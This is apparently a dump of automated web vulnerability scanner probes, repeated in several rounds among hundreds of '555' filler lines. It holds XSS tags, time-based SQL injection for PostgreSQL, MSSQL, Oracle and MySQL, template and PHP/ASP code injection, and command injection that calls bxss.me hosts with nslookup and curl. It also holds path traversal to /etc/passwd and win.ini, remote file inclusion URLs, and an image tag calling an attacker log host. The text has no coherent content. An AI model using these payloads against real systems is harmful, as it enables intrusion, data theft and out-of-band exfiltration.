ze5bmp
csbqec
555
555
555
555<aSH5G7P<
555
555
555<img sRc='http://attacker-9218/log.php?
555
555
555
555
555
555
555
555OHGUJ[!+!]
555
555q6c6U
555
555
555}body{zzz:Expre/**/SSion(7DNM(9410))}
555
555
555
555
555
555
555
555
555
555
555<ScRiPt>7DNM(9136)</sCripT>
555u003CScRiPt7DNM(9129)u003C/sCripTu003E
555
555
9565
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5557DNM(9649)
555
555
(select 198766*667891 from DUAL)
(select 198766*667891)
@@WSjah
555
555′”
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
5559437
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555EvK9mYQR’)) OR 869=(SELECT 869 FROM PG_SLEEP(15))–
555
555fLT7gD0L’) OR 958=(SELECT 958 FROM PG_SLEEP(15))–
555SJ8TC[!+!]
555lVzKx6gH’ OR 678=(SELECT 678 FROM PG_SLEEP(15))–
555
555-1)) OR 764=(SELECT 764 FROM PG_SLEEP(15))–
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
555-1) OR 615=(SELECT 615 FROM PG_SLEEP(15))–
dfb__${98991*97996}__::.x
555-1 OR 986=(SELECT 986 FROM PG_SLEEP(15))–
555IDpGHKmC’; waitfor delay ‘0:0:15’ —
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
555-1 waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
1}}”}}’}}1%>”%>’%>
<th:t="${dfb}#foreach
555-1; waitfor delay ‘0:0:15’ —
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
bfgx5525z1z2abcxhjl5525
555*if(now()=sysdate(),sleep(15),0)
555
bfg1384s1s2s3hjl1384
555
5559293253
555
555
‘”()&%
555
555
555
555′”()&%
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
[php]print(md5(31337));[/php]
{php}print(md5(31337));{/php}
555
555
555
print(md5(31337));//
555
555
555
555
555
‘{${print(md5(31337))}}’
555
555
‘.print(md5(31337)).’
555
555
${@print(md5(31337))}
555
555
${@print(md5(31337))}
555
555
“;print(md5(31337));$a=”
555
555
‘;print(md5(31337));$a=’
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
“+response.write(9500520*9131410)+”
555
555
555
‘+response.write(9500520*9131410)+’
555
response.write(9500520*9131410)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
gethostbyname(lc(‘hitqx’.’xndyapiqed379.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(105).chr(74).chr(112).chr(88)
“.gethostbyname(lc(“hitrz”.”tcahzsvrda2fe.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(114).chr(85).chr(100).chr(85).”
555
‘.gethostbyname(lc(‘hitij’.’zetrnvtda16c0.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(110).chr(73).chr(105).chr(89).’
555
555
555
555
555
555
555
555
555
555
<!–
‘”
555
555
555
555
555
555
555
555
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitqcfqkranvf19665.bxss.me||curl${IFS}hitqcfqkranvf19665.bxss.me)&'”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqcfqkranvf19665.bxss.me||curl${IFS}hitqcfqkranvf19665.bxss.me)&`’
555
http://bxss.me/t/fit.txt.jpg
|(nslookup${IFS}-q${IFS}cname${IFS}hitiqloghczll341f7.bxss.me||curl${IFS}hitiqloghczll341f7.bxss.me)
555
555
555
;(nslookup -q=cname hitwtcasgorpka35fd.bxss.me||curl hitwtcasgorpka35fd.bxss.me)|(nslookup -q=cname hitwtcasgorpka35fd.bxss.me||curl hitwtcasgorpka35fd.bxss.me)&(nslookup -q=cname hitwtcasgorpka35fd.bxss.me||curl hitwtcasgorpka35fd.bxss.me)
Http://bxss.me/t/fit.txt
555
555
bxss.me
c:/windows/win.ini
`(nslookup -q=cname hitcicpwiawpf8a4d0.bxss.me||curl hitcicpwiawpf8a4d0.bxss.me)`
555
|(nslookup -q=cname hitpwzuvtzfdeb58fe.bxss.me||curl hitpwzuvtzfdeb58fe.bxss.me)
555
../../../../../../../../../../../../../../etc/shells
555
&(nslookup -q=cname hitjqjwnfickec1937.bxss.me||curl hitjqjwnfickec1937.bxss.me)&'”`0&(nslookup -q=cname hitjqjwnfickec1937.bxss.me||curl hitjqjwnfickec1937.bxss.me)&`’
555
/etc/shells
555
&nslookup -q=cname hitfxrnuapsks79c19.bxss.me&'”`0&nslookup -q=cname hitfxrnuapsks79c19.bxss.me&`’
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
$(nslookup -q=cname hitebzltzgycr247a9.bxss.me||curl hitebzltzgycr247a9.bxss.me)
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
(nslookup -q=cname hithstbxvyqyxdf617.bxss.me||curl hithstbxvyqyxdf617.bxss.me))
555
expr 9000312195 – 935845
555
555
555|echo mvrkzs$() jcqfztnz^xyu||a #’ |echo mvrkzs$() jcqfztnz^xyu||a #|” |echo mvrkzs$() jcqfztnz^xyu||a #
555
555
555
555
|echo spsctk$() jotnbinz^xyu||a #’ |echo spsctk$() jotnbinz^xyu||a #|” |echo spsctk$() jotnbinz^xyu||a #
555
555
555
555
555
555&echo prxptj$() albuhqnz^xyu||a #’ &echo prxptj$() albuhqnz^xyu||a #|” &echo prxptj$() albuhqnz^xyu||a #
555
555
555
555
&echo rswlwy$() blcjznnz^xyu||a #’ &echo rswlwy$() blcjznnz^xyu||a #|” &echo rswlwy$() blcjznnz^xyu||a #
555
555
555
555
555
555
555
555
echo tbobrg$() lxwwygnz^xyu||a #’ &echo tbobrg$() lxwwygnz^xyu||a #|” &echo tbobrg$() lxwwygnz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<aEyFnQL<
555
555
../555
555
555<img sRc='http://attacker-9972/log.php?
555
555
555
bxss.me/t/rfi.php?
http://bxss.me/t/rfi.php?
file:///etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
bxss.me/t/xss.html?
../../../../../../../../../../../../../../etc/passwd
555
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5555SK5H[!+!]
555
555
555
555
555
555
555
555
555OGWSl
555
555
555
555
555}body{zzz:Expre/**/SSion(NwTZ(9226))}
555
555
555
555
555
555
‘A’.concat(70-3).concat(22*4).concat(103).concat(79).concat(115).concat(73)+(require’socket’
Socket.gethostbyname(‘hitgm’+’uailjujva3afa.bxss.me.’)[3].to_s)
‘+’A’.concat(70-3).concat(22*4).concat(121).concat(90).concat(109).concat(75)+(require’socket’
Socket.gethostbyname(‘hitig’+’qgochwqm2eddf.bxss.me.’)[3].to_s)+’
555
555
555
“+”A”.concat(70-3).concat(22*4).concat(107).concat(68).concat(113).concat(71)+(require”socket”
Socket.gethostbyname(“hitee”+”cwlmfnry6273e.bxss.me.”)[3].to_s)+”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<ScRiPt>NwTZ(9581)</sCripT>
555
555
555
555
555
555
555
555
555
555
555
555
555u003CScRiPtNwTZ(9876)u003C/sCripTu003E
555
555
555
555
555
555
555
555
555
9176
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select 198766*667891 from DUAL)
555
555
555
555
(select 198766*667891)
555
555
555
@@YM69P
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555′”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
555
555
555
555
555YBzEj4f4′)) OR 480=(SELECT 480 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
555Tz2vNv4s’) OR 400=(SELECT 400 FROM PG_SLEEP(15))–
555
555NwTZ(9609)
555
555
${9999332+9999768}
555
555
555
555
555
555hbND44NS’ OR 544=(SELECT 544 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555-1) OR 450=(SELECT 450 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
5559955
555-1 OR 84=(SELECT 84 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555cWotZWvs’; waitfor delay ‘0:0:15’ —
555
555
555
555
555″||sleep(27*1000)*hwuzqj||”
555
555
555’||sleep(27*1000)*ufpfls||’
555
555-1 waitfor delay ‘0:0:15’ —
555UZHUL[!+!]
555
555
555
555
555″&&sleep(27*1000)*cafztv&&”
555-1); waitfor delay ‘0:0:15’ —
555
555’&&sleep(27*1000)*hhcfmn&&’
555
555
555
‘”()
555-1; waitfor delay ‘0:0:15’ —
555
555
Array
555
555
555
Array
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
555
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
dfb__${98991*97996}__::.x
555
555
555
555
555
555
555
555
dfb[[${98991*97996}]]xca
555
555
555
555
555
555
555
555
555
555
555
555
555
555
dfb{{98991*97996}}xca
555
555
555
555
555
555
555
555
1}}”}}’}}1%>”%>’%>
555
555
555
555
<th:t="${dfb}#foreach
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bfgx8946z1z2abcxhjl8946
555
555
555
555
555
555
bfg4529s1s2s3hjl4529
555
555
555
555
555
5559207415
555
555
555
555
‘”()&%
555
555
555
555
555
555′”()&%
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
!(()&&!|*|*|
)
555
555
555
555
555
555
555
555

555
555
555
555
555
555

555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
“+response.write(9919920*9690933)+”
‘+response.write(9919920*9690933)+’
555
555
[php]print(md5(31337));[/php]
{php}print(md5(31337));{/php}
print(md5(31337));//
555
555
‘{${print(md5(31337))}}’
555
555
555
‘.print(md5(31337)).’
${@print(md5(31337))}
555
${@print(md5(31337))}
“;print(md5(31337));$a=”
‘;print(md5(31337));$a=’
555
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitwubclroyqo70137.bxss.me||curl${IFS}hitwubclroyqo70137.bxss.me)&'”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwubclroyqo70137.bxss.me||curl${IFS}hitwubclroyqo70137.bxss.me)&`’
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitarqasnfxhaf07d3.bxss.me||curl${IFS}hitarqasnfxhaf07d3.bxss.me)
555
;(nslookup -q=cname hitbgiupauwak1b624.bxss.me||curl hitbgiupauwak1b624.bxss.me)|(nslookup -q=cname hitbgiupauwak1b624.bxss.me||curl hitbgiupauwak1b624.bxss.me)&(nslookup -q=cname hitbgiupauwak1b624.bxss.me||curl hitbgiupauwak1b624.bxss.me)
555
555
`(nslookup -q=cname hitcnlkqhaoyw8c0cf.bxss.me||curl hitcnlkqhaoyw8c0cf.bxss.me)`
|(nslookup -q=cname hitxacejhukvv39e43.bxss.me||curl hitxacejhukvv39e43.bxss.me)
&(nslookup -q=cname hitavwtzgfceof6377.bxss.me||curl hitavwtzgfceof6377.bxss.me)&'”`0&(nslookup -q=cname hitavwtzgfceof6377.bxss.me||curl hitavwtzgfceof6377.bxss.me)&`’
555
&nslookup -q=cname hitsjpeuykted4da70.bxss.me&'”`0&nslookup -q=cname hitsjpeuykted4da70.bxss.me&`’
$(nslookup -q=cname hitakhqyrylrv9c640.bxss.me||curl hitakhqyrylrv9c640.bxss.me)
555
(nslookup -q=cname hitkkqpnqrvop18b90.bxss.me||curl hitkkqpnqrvop18b90.bxss.me))
555
expr 9000684590 – 929740
555|echo crklxp$() uqpmounz^xyu||a #’ |echo crklxp$() uqpmounz^xyu||a #|” |echo crklxp$() uqpmounz^xyu||a #
555
555
|echo vomdlo$() kxdkdfnz^xyu||a #’ |echo vomdlo$() kxdkdfnz^xyu||a #|” |echo vomdlo$() kxdkdfnz^xyu||a #
555
555
555
555&echo sxvluo$() wcpxmunz^xyu||a #’ &echo sxvluo$() wcpxmunz^xyu||a #|” &echo sxvluo$() wcpxmunz^xyu||a #
&echo zwtrgc$() lubojenz^xyu||a #’ &echo zwtrgc$() lubojenz^xyu||a #|” &echo zwtrgc$() lubojenz^xyu||a #
555
555
555
555
555
555
555
echo odnsyt$() aicoywnz^xyu||a #’ &echo odnsyt$() aicoywnz^xyu||a #|” &echo odnsyt$() aicoywnz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
<!–
555
555
555
‘”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
gethostbyname(lc(‘hitrp’.’vnbdvcuk2c722.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(110).chr(88).chr(122).chr(77)
555
555
555
555
“.gethostbyname(lc(“hittt”.”qkfvcxar005f7.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(119).chr(73).chr(107).chr(74).”
555
‘.gethostbyname(lc(‘hitsm’.’tatelfrrb6506.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(111).chr(88).chr(121).chr(87).’
555
555
555
555
555
bxss.me/t/rfi.php?
555
555
http://bxss.me/t/rfi.php?
555
555
bxss.me/t/xss.html?
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://bxss.me/t/fit.txt.jpg
555
555
555
555
Http://bxss.me/t/fit.txt
bxss.me
555
555
555
c:/windows/win.ini
../../../../../../../../../../../../../../etc/shells
555
555
/etc/shells
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
file:///etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555″||sleep(27*1000)*kujprb||”
555
555’||sleep(27*1000)*uvnmai||’
555″&&sleep(27*1000)*vcculf&&”
555
555
‘A’.concat(70-3).concat(22*4).concat(120).concat(84).concat(116).concat(84)+(require’socket’
Socket.gethostbyname(‘hitiw’+’lwvdwpwhb9cf3.bxss.me.’)[3].to_s)
555’&&sleep(27*1000)*edmvoo&&’
555
‘”()
555
555
‘+’A’.concat(70-3).concat(22*4).concat(111).concat(69).concat(101).concat(90)+(require’socket’
Socket.gethostbyname(‘hituf’+’gymqnsev94505.bxss.me.’)[3].to_s)+’
555
Array
555
“+”A”.concat(70-3).concat(22*4).concat(109).concat(74).concat(110).concat(70)+(require”socket”
Socket.gethostbyname(“hitrt”+”cwgqicajbbda9.bxss.me.”)[3].to_s)+”
555
555
Array
555
555
Array
555
555
555
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000272+9999763}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555

555
555
555

555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<aAdrAuw<
555
555
555<img sRc='http://attacker-9130/log.php?
555
555
555
555
555
555
555NPBWO[!+!]
555VHBDJ
555}body{zzz:Expre/**/SSion(50Zx(9637))}
555
555
555
(select 198766*667891 from DUAL)
(select 198766*667891)
@@mXebf
555′”
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555BkVRsZSC’)) OR 132=(SELECT 132 FROM PG_SLEEP(15))–
555w6f9klC9′) OR 620=(SELECT 620 FROM PG_SLEEP(15))–
555<ScRiPt>50Zx(9534)</sCripT>
555bkzEihVo’ OR 726=(SELECT 726 FROM PG_SLEEP(15))–
555-1)) OR 672=(SELECT 672 FROM PG_SLEEP(15))–
555u003CScRiPt50Zx(9208)u003C/sCripTu003E
555-1) OR 369=(SELECT 369 FROM PG_SLEEP(15))–
555-1 OR 635=(SELECT 635 FROM PG_SLEEP(15))–
5558fU6BSme’; waitfor delay ‘0:0:15’ —
9921
555-1 waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
555-1; waitfor delay ‘0:0:15’ —
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
55550Zx(9155)
555
555
555
555
555
555
555
555
555
555
555
5559617
555
555
555
555
5550MRM6[!+!]
555
555
555
555
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
555
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1}}”}}’}}1%>”%>’%>
<th:t="${dfb}#foreach
555
555
bfgx6092z1z2abcxhjl6092
bfg6574s1s2s3hjl6574
5559398628
‘”()&%
555′”()&%
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
“+response.write(9443791*9983265)+”
555
‘+response.write(9443791*9983265)+’
555
555
555
[php]print(md5(31337));[/php]
555
{php}print(md5(31337));{/php}
response.write(9443791*9983265)
555
print(md5(31337));//
555
‘{${print(md5(31337))}}’
555
555
555
555
‘.print(md5(31337)).’
555
555
555
${@print(md5(31337))}
555
${@print(md5(31337))}
555
555
“;print(md5(31337));$a=”
555
‘;print(md5(31337));$a=’
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
555
555
gethostbyname(lc(‘hitff’.’gyoduhxp0fc01.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(114).chr(72).chr(106).chr(90)
“.gethostbyname(lc(“hitri”.”ztmjyycp9ee62.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(98).chr(70).chr(119).chr(78).”
<!–
555
555
‘”
‘.gethostbyname(lc(‘hitrg’.’ncwahucu3a393.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(120).chr(75).chr(111).chr(68).’
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitgsdmgojxnk845b7.bxss.me||curl${IFS}hitgsdmgojxnk845b7.bxss.me)&'”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitgsdmgojxnk845b7.bxss.me||curl${IFS}hitgsdmgojxnk845b7.bxss.me)&`’
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitcbowzbptsgdf8fe.bxss.me||curl${IFS}hitcbowzbptsgdf8fe.bxss.me)
555
555
555
555
;(nslookup -q=cname hitktvvshkpql127fc.bxss.me||curl hitktvvshkpql127fc.bxss.me)|(nslookup -q=cname hitktvvshkpql127fc.bxss.me||curl hitktvvshkpql127fc.bxss.me)&(nslookup -q=cname hitktvvshkpql127fc.bxss.me||curl hitktvvshkpql127fc.bxss.me)
555
555
555
`(nslookup -q=cname hitxphlxjfbeo6d6b9.bxss.me||curl hitxphlxjfbeo6d6b9.bxss.me)`
555
555
555
555
|(nslookup -q=cname hitldkwpdupvfb8245.bxss.me||curl hitldkwpdupvfb8245.bxss.me)
555
555
555
555
&(nslookup -q=cname hitachyhsbtvg54180.bxss.me||curl hitachyhsbtvg54180.bxss.me)&'”`0&(nslookup -q=cname hitachyhsbtvg54180.bxss.me||curl hitachyhsbtvg54180.bxss.me)&`’
555
555
&nslookup -q=cname hitikjzrhqpeo4d153.bxss.me&'”`0&nslookup -q=cname hitikjzrhqpeo4d153.bxss.me&`’
555
555
555
$(nslookup -q=cname hitjggjcseuhgd1312.bxss.me||curl hitjggjcseuhgd1312.bxss.me)
555
555
555
(nslookup -q=cname hitxfmaxvpuyve5133.bxss.me||curl hitxfmaxvpuyve5133.bxss.me))
555
555
expr 9000292411 – 937615
555
555
555|echo cedzay$() bhygtenz^xyu||a #’ |echo cedzay$() bhygtenz^xyu||a #|” |echo cedzay$() bhygtenz^xyu||a #
555
555
|echo edffnj$() edsahanz^xyu||a #’ |echo edffnj$() edsahanz^xyu||a #|” |echo edffnj$() edsahanz^xyu||a #
555
555
555&echo qqxfkt$() rrzfcdnz^xyu||a #’ &echo qqxfkt$() rrzfcdnz^xyu||a #|” &echo qqxfkt$() rrzfcdnz^xyu||a #
555
555
&echo onnaya$() wyehmlnz^xyu||a #’ &echo onnaya$() wyehmlnz^xyu||a #|” &echo onnaya$() wyehmlnz^xyu||a #
555
555
555
555
echo coonsq$() nghmdrnz^xyu||a #’ &echo coonsq$() nghmdrnz^xyu||a #|” &echo coonsq$() nghmdrnz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bxss.me/t/rfi.php?
555
555
555
555
555
555
555
http://bxss.me/t/rfi.php?
555
555
555
555
bxss.me/t/xss.html?
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://bxss.me/t/fit.txt.jpg
Http://bxss.me/t/fit.txt
555
bxss.me
555
555
c:/windows/win.ini
555
../../../../../../../../../../../../../../etc/shells
/etc/shells
555
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
../555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
file:///etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
‘A’.concat(70-3).concat(22*4).concat(117).concat(65).concat(98).concat(89)+(require’socket’
Socket.gethostbyname(‘hitws’+’uynmcchkbc779.bxss.me.’)[3].to_s)
555
‘+’A’.concat(70-3).concat(22*4).concat(119).concat(78).concat(121).concat(78)+(require’socket’
Socket.gethostbyname(‘hitqx’+’mkyayqzd1bc50.bxss.me.’)[3].to_s)+’
555
“+”A”.concat(70-3).concat(22*4).concat(120).concat(87).concat(102).concat(79)+(require”socket”
Socket.gethostbyname(“hitra”+”qxzxcato004af.bxss.me.”)[3].to_s)+”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555″||sleep(27*1000)*sxxruf||”
555
555’||sleep(27*1000)*rfujgn||’
555
555
555
555
555″&&sleep(27*1000)*aooowv&&”
555
555
555
555
555
555
555
555’&&sleep(27*1000)*cdtwdh&&’
555
555
555
555
555
555
‘”()
555
Array
555
555
555
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000406+9999884}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
!(()&&!|*|*|
555
)
555
555
555
555
555
555
555
555
555

555
555

555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
‘+response.write(9312948*9979296)+’
response.write(9312948*9979296)
555
555
555
555
555
[php]print(md5(31337));[/php]
{php}print(md5(31337));{/php}
555
555
555
print(md5(31337));//
555
‘{${print(md5(31337))}}’
555
555
555
555
555
‘.print(md5(31337)).’
555
${@print(md5(31337))}
555
555
555
${@print(md5(31337))}
555
“;print(md5(31337));$a=”
555
‘;print(md5(31337));$a=’
555
555
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
